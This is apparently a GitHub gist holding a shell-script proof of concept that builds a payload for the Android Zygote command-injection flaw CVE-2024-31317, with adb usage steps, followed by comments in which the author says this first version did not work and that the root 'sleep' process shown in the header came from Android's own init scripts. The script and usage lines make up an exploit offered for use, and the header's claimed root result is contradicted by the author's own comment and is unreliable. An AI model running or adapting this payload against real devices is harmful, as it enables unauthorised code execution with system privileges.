-
-
Save rabits/eef4fad0bd024786a3afde2bc1f32b7e to your computer and use it in GitHub Desktop.
| #!/bin/sh | |
| # PoC prepares the payload of commands to execute through the zygote injection CVE-2024-31317: | |
| # https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html | |
| # | |
| # Tested on honor-magic-v2_ver-n49; Build 7.2.0.108(C636E1R2P2); Sec patch Dec 1, 2023 | |
| # | |
| # USAGE (android 13, with pre-13 use 12200 instead of 32768) | |
| # host$ adb push payload.sh /sdcard/ | |
| # host$ adb shell | |
| # shell$ settings put global hidden_api_blacklist_exemptions "$(sh /sdcard/payload.sh 8192 32768 sh -c 'sleep 200')" | |
| # [disconnect (zygote crash)] | |
| # host$ adb shell | |
| # shell$ ps -A | grep sleep | |
| # root 480 2 0 0 0 0 S [adspsleepmon-wo] | |
| # root 20055 19988 11122152 3792 0 0 S sleep | |
| buffer_size=$1 | |
| shift | |
| zygote_read_abort_size=$1 | |
| shift | |
| cmd_len=$# | |
| cmd="$1" | |
| shift | |
| prefix="6 --set-api-denylist-exemptions " | |
| prefix_len=$(echo -n "$prefix" | wc -c) | |
| add_chars=$(($buffer_size - $prefix_len - 1)) | |
| payload=$(printf "\n\n\n\n\n%${add_chars}s" $cmd_len | tr ' ' A) | |
| echo | |
| for arg in "$@"; do | |
| payload="$payload\n$(echo "$arg")" | |
| done | |
| payload="$payload\n$(echo "$cmd")" | |
| echo "$payload" | |
| payload_len=$(echo "$payload" | wc -c) | |
| add_chars=$(($zygote_read_abort_size - ($prefix_len + $payload_len))) | |
| printf "%${add_chars}s" ',' | tr ' ' ',' | |
| echo X |
Hi @diabl0w , this the first iteration (PoC1) - works not as I expected. Better check the second one by the link above. In this one I thought that sh sleep is actually caused by my payload, but nope it's caused by some init scripts of android itself...
Hi @diabl0w , this the first iteration (PoC1) - works not as I expected. Better check the second one by the link above. In this one I thought that sh sleep is actually caused by my payload, but nope it's caused by some init scripts of android itself...
Okay thanks for the clqrif8cation, I figured that mightve been the case... okay I'll have to try out the v2 and see what I could come up with
I think the issue is mostly in timings - so the legitimate app need to be transferred to zygote in the time of the imposter to get back to system to steal it's binding. But I was unable to get to this point...
in the header of the script, you are showing that you got
sleeprunning asuid 0, but your comment log shows that zygote aborts and crashes... does thesleepcontinue to run despite zygote crash that you are able to capture thatps? I ask because I am getting the sameUnreasonable argument count 24553error, but I am not getting the sleep process running